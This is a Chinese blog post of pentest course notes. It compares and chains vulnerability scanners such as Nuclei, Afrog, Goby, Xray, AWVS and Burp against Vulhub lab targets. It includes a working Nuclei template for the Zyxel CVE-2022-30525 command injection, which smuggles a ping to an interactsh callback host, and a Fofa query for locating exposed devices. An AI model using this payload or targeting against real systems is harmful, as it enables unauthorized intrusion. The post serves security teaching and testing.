漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动

已于 2024-03-19 20:27:40 修改
阅读量3.1k 收藏 40
点赞数 22
分类专栏: # 漏洞发现 文章标签: Nucler Afrog Xray Goby Awvs 工具联动
于 2024-03-13 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/136665189
版权
本文介绍了当前主流的漏洞扫描工具如BurpSuite、Acunetix、Xray、Goby、Nuclei等,涵盖Web、框架组件、APP等领域,强调了它们的综合扫描、特征扫描和联动扫描功能,以及Poc开发和相关插件的使用。文章还展示了工具之间的联动扫描应用场景和优缺点分析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点

1、综合类-Burp&Xray&Awvs&Goby
2、特征类-Afrog&Yakit&Nuclei
3、联动类-主动扫描&被动扫描&中转扫描

章节点:
漏洞发现-Web&框架组件&中间件&APP&小程序&系统
扫描项目-综合漏扫&特征漏扫&被动漏扫&联动漏扫
Poc开发-Ymal语法&联动导入&项目拓展
扫描插件-Burpsuite插件&浏览器插件

在这里插入图片描述

市面上有很多漏扫系统工具脚本,课程讲到的基本都是目前主流推荐的优秀项目!
Burpsuite,Awvs,Xray,Goby,Afrog,Yakit,Nuclei,Vulmap,Pocassist,Nessus,Pentestkit,Kunyu,Pocsuite3,浏览器各类插件,Burpsuite插件(HaE,ShiroScan,FastJsonScan,Log4j2Scan,Springscan,JScan等)。

BurpSuite是用于攻击web 应用程序的集成平台,包含了许多工具。BurpSuite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Acunetix一款商业的Web漏洞扫描程序,它可以检查Web应用程序中的漏洞,如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个操作方便的图形用户界面,并且能够创建专业级的Web站点安全审核报告。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力。

Xray是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持Windows /macOS /Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。

Goby是一款新的网络安全测试工具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。能通过智能自动化方式,帮助安全入门者熟悉靶场攻防,帮助攻防服务者、渗透人员更快的拿下目标。

Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。 提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。(注意:不同工具的yaml模板都不同,无法做到通用)

Afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描(挖洞)工具,PoC 涉及 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。

Yakit是一款集成化单兵安全能力平台,通过函数提供各类底层安全能力,包括端口扫描、指纹识别、poc框架、shell管理、MITM劫持、强大的插件系统等。旨在打造一个覆盖渗透测试全流程的网络安全工具库。

一、演示案例-特征类-三方Poc调用&模版Poc调用

案例1:单点对某特征点进行安全评估

docker拉取靶场镜像:
docker run -it -p 8888:8080 vulhub/struts2:s2-053
docker run -it -p 8090:8090 vulhub/fastjson:1.2.45
docker run -it -p 8888:8080 vulhub/shiro:1.2.4

1、Goby-综合类

https://gobysec.net/
GUI界面,使用简单,直接有手就行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、Nuclei-较综合类

官网地址:https://nuclei.projectdiscovery.io/
项目下载:https://github.com/projectdiscovery/nuclei

官方Nuclei-Templates&第三方Nuclei-Templates:
https://github.com/projectdiscovery/nuclei-templates
https://github.com/ExpLangcn/NucleiTP
在这里插入图片描述
扫描批量url

nucle -l urls.txt

扫描单个目标

nuclei -target xxx.com

在这里插入图片描述
加载对应的poc脚本,可以是当前路径下

nuclei -t ./test/
nuclei -t ./test/test.yaml

推荐使用,批量检测urls.txt,poc为test.yaml,输出结果result.txt

nuclei -l urls.txt -t test.yaml -o result.txt

3、Afrog-特征类

https://github.com/zan8in/afrog

Afrog是一款性能卓越、快速稳定、PoC可定制的漏洞扫描(挖洞)工具,PoC涉及CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。

扫描单个目标

afrog -t http://example.com -o result.html

扫描多个目标

afrog -T urls.txt -o result.html

测试单个PoC

afrog -t http://example.com -P ./testing/poc-test.yaml -o result.html

测试多个PoC

afrog -t http://example.com -P ./testing/ -o result.html

4、Yakit-可特征可综合

https://www.yaklang.com/
GUI界面,使用简单,直接有手就行
在这里插入图片描述

案例2:新型对某特征点进行安全评估

例子:CVE-2022-30525: Zyxel 防火墙远程命令注入漏洞
https://blog.csdn.net/weixin_43080961/article/details/124776553

复现:

Fofa:title=="USG FLEX 50 (USG20-VPN)"

nuclei.exe -t Zyxel.yaml -l z.txt

Zyxel.yaml:

id: CVE-2022-30525
info:
  name: cx
  author: remote
  severity: high
  tags: CVE-2022-30525
  reference: CVE-2022-30525
requests:
  - raw:
      - |
        POST /ztp/cgi-bin/handler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8
        
        {"command": "setWanPortSt","proto": "dhcp","port": "1270","vlan_tagged": "1270","vlanid": "1270","mtu": "{{exploit}}","data":""}
        
    payloads:
      exploit:
        - ";ping -c 3 {{interactsh-url}};"
    attack: pitchfork
    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

在这里插入图片描述
在这里插入图片描述

二、演示案例-综合类-主动漏扫&中转联动&被动联动

案例1:单点工具主动对某站点进行安全评估

http://testphp.vulnweb.com/
在这里插入图片描述

awvs

在这里插入图片描述

xray

.\xray_windows_amd64.exe webscan --basic-crawler http://xx/ --html-output xx.html

在这里插入图片描述
在这里插入图片描述

案例2:联动对APP抓包进行安全评估

eg:安卓模拟器某APP应用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

之后在模拟器上打开APP,bp就会收到相关数据包并转发给xray
在这里插入图片描述

对比工具优缺点

爬虫:常规漏洞测试
Poc:用网上各种组件框架的漏洞去测试
Awvs:爬虫强,Poc国内差点
任务添加&数据头部&代理模式&扫描模式等
Xray:爬虫弱,Poc国内友好

工具联动意义

1、相互联动性解决漏扫(APP、小程序等)
2、相互联动性解决URL未探针

Burp&Xray联动-抓包给xray扫

在这里插入图片描述
在这里插入图片描述
1、主-Burp设置转发代理
在这里插入图片描述
2、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

在这里插入图片描述

Awvs&Xray联动-爬虫给xray扫

1、主-Awvs设置代理扫描
在这里插入图片描述
2、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7788 --html-output xx.html

在这里插入图片描述

Awvs&Burp&Xray中转联动-都扫看流量

1、主-Awvs设置代理扫描
在这里插入图片描述
2、中-Burp设置转发代理
在这里插入图片描述
3、副-Xray设置被动扫描

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output xx.html

在这里插入图片描述

web安全渗透测试工具(一):快速发现漏洞漏洞综合描和联动
HACKONE的博客
05-24 807
Burpsuite,AwvsXrayGobyAfrog,Yakit,Nuclei,Vulmap,Pocassist,Nessus,Pentestkit,Kunyu,Pocsuite3,浏览器各类插件,Burpsuite插件(HaE,ShiroScan,FastJsonScan,Log4j2Scan,Springscan,JScan等)。Acunetix一款商业的Web漏洞描程序,它可以检查Web应用程序中的漏洞,如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。
ARL联动AWVS实现自动化漏洞
INSBUG的博客
07-08 1246
很多场景下需要大范围的漏洞和快速排查互联网暴露面的漏洞,需要使用这种自动化的手段,常规渗透测试的找互联网暴露面是,域名>子域名>IP>C段>端口,可以手动收集,也可以借助一些网络搜索引擎(fofa、zoomeye、hunter等)然后进行指纹识别、存活探测等等,再用xray或者nuclei、afrog之类的工具过一遍,手工渗透一下。可以先描,然后自己创建描策略,将一些误报多的漏洞排除,比如一些TLS之类的漏洞、HTTP不安全之类,直接就不选了。运行脚本,开始循环监测,ARL新增资产后会进行描。
打造全自动漏洞赏金工具
渗透测试研究中心
08-25 2942
打造全自动漏洞赏金工具
nuclei:Nuclei是基于模板的可配置目标漏洞描的快速工具,具有大量可扩展性和易用性
03-19
基于简单的基于YAML的DSL的快速且可自定义的漏洞描程序。 ••••••• Nuclei用于基于模板发送跨目标的请求,从而导致零误报并提供对大量主机的快速描。 Nuclei提供描各种协议的功能,包括TCP,DNS,HTTP,文件等。借助强大灵活的模板,可以使用Nuclei对各种安全检查进行建模。 我们有一个,其中包含由100多名安全研究人员和工程师提供的各种类型的漏洞模板。它使用-update-templates标志预加载了可以使用的模板。 怎么运行的 安装Nuclei :play_button: GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 更多的安装。 下载范本 您可以使用以下命令下载和更新原子核模板更新模板核的标志,可从下载所有可用的核模板, 是社区策划的准备使用的模板列表。 :play_button: nucle
工具介绍《Nuclei》
最新发布
qq_46143339的博客
03-20 1337
Nuclei是由开发的一款基于 YAML 模板的快速漏洞描器,专注于通过零误报的定制化模板实现高效安全检测。其核心设计理念是“以攻击性安全增强防御”,通过社区驱动的模板生态覆盖广泛漏洞场景。
Day101:漏洞发现-项目&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
qq_61553520的博客
04-14 1985
小迪安全-Day101:漏洞发现-项目&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
nuclei-快速漏洞描器【安装&使用详解】
08-06 5656
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。
Nuclei:开源漏洞描器
网络研究观
08-27 754
基于简单 YAML DSL 的快速且可定制的漏洞描程序。
使用nuclei自测漏洞
suiyupiaomiao的博客
07-09 1530
nuclei分windows版和linux版,我的windows安装之后有问题,就使用kali linux安装的,kali使用apt安装不用单独下载安装包,比价方便。此方法可以进行临时测试,前提是已经有了最新的漏洞模版,也可以修复好漏洞描确认。
第七十三天 漏洞发现-操作系统服务中间件&Nuclei&Nessus.&Nexpose&Goby
qq_46343633的博客
03-02 694
1、Goby简单介绍&使用说明2.Nuclei简单介绍&使用说明3、Nessus简单介绍&使用说明4、Nexpose简单介绍&使用说明5、掌握工具安装使用&原理&联动&适用市面上有很多系统工具脚本,果程讲到的基本都是目前主流推荐的优秀项目!具体项目:Burpsuite,AwWs,Xray,Goby,Afrog,Vulmap,Pocassist,Nessus,
nuclei 漏洞工具
05-06
nuclei 漏洞工具
被动漏洞描系统.zip
03-08
Gourdscan v2.1 被动漏洞描系统 Passive Vulnerability Scan 为避免 Gourdscan 被恶意利用,开源版本只放出了简单的探测规则,无法用作为黑客入侵工具。请使用者遵守《中华人民共和国网络安全法》,勿将 Gourdscan 用于未授权的测试,参与项目的社区成员/YSRC/同程安全应急响应中心/同程网络科技股份有限公司不负任何连带法律责任。 安装依赖: Linux 安装 Redis apt-get install redis-server 或从源码编译安装 wget http://download.redis.io/redis-stable.tar.gz && tar xzf redis-stable.tar.gz && cd redis-stable && make && make install 系统已有 Redis 的,运行 redis-server --version 查看自己的版本,需注意2.x版本的 Redis 会有问题 安转 python 类库 基础模块 安装pip wget https://sec.ly.com/mirror/get-pip.py --no-check-certificate && python get-pip.py -i https://mirrors.aliyun.com/pypi/simple/ $ pip install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 其他事项 以下如果有报错便可以安装,一般不需要安装 镜像: https://sec.ly.com/mirror/libdnet-libdnet-1.12.tar.gz https://sec.ly.com/mirror/pylibpcap-0.6.4.tar.gz $ wget https://github.com/dugsong/libdnet/archive/master.zip && unzip master.zip $ wget http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz && tar zxf pylibpcap-0.6.4.tar.gz Windows 下载 Redis https://sec.ly.com/mirror/Redis-x64-3.2.100.zip 启动 Redis redis-server.exe GourdScan路径\conf\redis.conf 如需使用网卡抓包方式,同程src已有各依赖镜像,可以把exe文件都装上 https://sec.ly.com/mirror/dnet-1.12.win32-py2.7.exe https://sec.ly.com/mirror/dpkt-1.7.win32.exe https://sec.ly.com/mirror/pcap-1.1.win32-py2.7.exe https://sec.ly.com/mirror/WinPcap_4_1_3.exe OSX 安装 homebrew /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 安装 redis brew install redis 启动 redis redis-server conf/redis.conf 安装依赖 pip install pcapy -i https://pypi.doubanio.com/simple/ git clone https://github.com/dugsong/libdnet.git && cd libdnet && ./configure && make && cd python && python setup.py install 使用方法: redis-server conf/redis.conf python gourdscan.py conf.json 默认平台用户名密码为:admin:Y3rc_admin 默认redis密码为:Y3rc_Alw4ys_B3_W1th_Y0u 如果有勾选sqlmap api scan选项,请在服务器上开启sqlmap api。 一切正常的话你就可以在8000端口上访问到 GourdScanV2 的 web 界面了 Start Monitor 中提供了三种代理方式,区别的话在下方文档有
Nuclei漏洞工具
xiaoheizi的博客
07-28 6311
提供 TCP、DNS、HTTP、FILE 等各类协议的描,通过强大且灵活的模板,可以使用 Nuclei 模拟各种安全检查。要检测的漏洞是CVE-2023-0126,所以进入模板目录nuclei-templates-9.5.8\http\cves\2023找到CVE-2023-0126.yaml。输入:nuclei.exe -l 2022_30525.txt -tags sonicwall。命令讲解:-l 指定目标txt文件 -tags 指定要使用的模板标签。输入:nuclei -u 目标地址。
Nuclei-快速漏洞描器
Blanks的博客
11-28 1776
Nuclei快速漏洞描器,开启一键描。 泷羽Sec出品,必属精品。
FoFA联动nuclei的自动化工具
2301_79457955的博客
05-19 2092
nuclei: 去官方下载nuclei,这里我只讲单文件版本配置方式,github的nuclei官方项目:nuclei 进入release,选择适合自己的版本,这里我是用amd64的,解压出来然后使用chmod u+x nuclei给予执行权限,然后mv nculei环境变量目录(输入环境变量就可以在任何目录执行该程序),就可以直接使用了image.png。这是一个结合fofa和nuclei的批量化描脚本,能够根据给出的关键词进行批量化描,适合放在linux服务器上,可以实现24小时自动描。
Nuclei:高效、可定制的漏洞描器
gitblog_00328的博客
12-06 762
Nuclei:高效、可定制的漏洞描器 nuclei Fast and customizable vulnerability scanner based on simple YAML based DSL. 项目地址: https:...
漏洞描】Nuclei v3.2.7 官方版
qq_21039641的博客
05-26 704
Nuclei是一款强大的漏洞描器,由作者发布。Nuclei 用于基于模板跨目标发送请求,从而实现零误报并提供对大量主机的快速描。Nuclei 提供对各种协议的描,包括 TCP、DNS、HTTP、SSL、File、Whois、Websocket、Headless 等。凭借强大而灵活的模板,Nuclei 可用于对各种安全检查进行建模。
Nuclei:基于YAML语法快速漏洞描的安装指南
Sgirll的博客
12-12 2496
Nuclei 是一款备受赞誉的开源框架,Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞描器,它提供了强大的功能和灵活性,可以帮助您发现和识别各种 Web 漏洞。通过按照本文提供的安装指南,您可以轻松地安装和配置 Nuclei,并开始利用其功能来提升网络安全。但请记住,在使用 Nuclei 进行漏洞描时,请遵循适用法律和道德准则,并仅对经授权的目标进行测试。您可以从官方网站 (https://golang.org/) 下载适合您操作系统的最新版本的 Go,并按照官方指南进行安装。
【渗透工具】Nuclei POC—整合全网Nuclei的漏洞POC
TT小子的博客
06-27 1812
Nuclei POC,每日更新 | 自动整合全网Nuclei的漏洞POC,实时同步更新最新POC,保存已被删除的POC。通过批量克隆Github项目,获取Nuclei POC,并将POC按类别分类存放,使用Github Action实现(已有11wPOC)这个项目是一个 Python 脚本,用于批量克隆 GitHub 项目,获取 Nuclei POC,并将 POC 按类别分类存放到文件夹中。同时,使用 GitHub Action 每日自动运行脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值